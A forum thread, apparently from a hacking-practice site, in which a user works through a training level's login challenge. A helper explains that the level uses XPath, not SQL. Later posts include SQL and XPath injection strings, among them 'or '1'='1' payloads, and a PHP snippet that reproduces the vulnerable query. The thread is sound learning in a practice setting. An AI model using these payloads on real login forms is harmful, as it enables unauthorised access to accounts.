Zark0
7 years ago

Hi all,

This is my first post so please be understanding :D

I just need to know if my reflection is good or not :D

actually i try something like this :

‘ or realname='Sandra Murphy’ or 1=1

and some random character in the password.

Normally the instruction will be something like this

username = $_GET[username] AND password = $_GET[password]

so if I want to remove the and I need to add a OR condition so my injection will be like

username = $_GET[username] OR realname='Sandra Murphy' OR 1=1 AND password=$_GET[password]

If i make the translation :

0 OR 1 OR 1 AND 0

But that didn’t works, what’s wrong, my comprehension ? i make a stupid mistake like forgot a '

please could you help me ?

Thanks

4replies
2voices
205views
? [bolofecal]
7 years ago

You forgot something

[quote=Intermediate Level 6]This login screen is trying something a bit different and is not using SQL.[/quote]

Zark0
7 years ago | edited 7 years ago

hum i didn’t forget it but maybe misconception of this point

the request isn’t something like this

$xpath = “//user[username=‘” . $GET['username’] . “‘ and password=’” . $GET[‘password’] . “‘]”;[/Spoiler]

so if i had my line the new xpath is :

[Spoiler]$xpath = “//user[username=‘” . $GET['username’] . ‘ or realname='Sandra Murphy’ or 1=1 “‘ and password=’” . $GET[‘password’] . “‘]”;

? [bolofecal]
7 years ago

This @freewind1012 code may helps https://www.hackthis.co.uk/forum/level-discussion/intermediate-levels/intermediate-level-6/3696-intermediate-6-help I suggest you simulate in your own host if you can not complete.

Zark0
7 years ago

Hi,

First thanks for your help, I read the post and try some different thing

now i try to put that into the username

‘or '1’=‘1’ or realname/text()=‘Sandra Murphy

and something random in the password .

that didn’t work.

is my reflection totally wrong ? I try with the code from freewind2012 with some modification :

$query = "//user[username/text() = '" . $username . "' and realname/text() = '" . $realname . "' and password/text() = '" . $password . "']";

$username = "'or '1'='1' or '1'='1"; $password = "'or realname/text()='cool";

like this it works

You must be logged in to reply to this discussion. Login
1 of 5

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss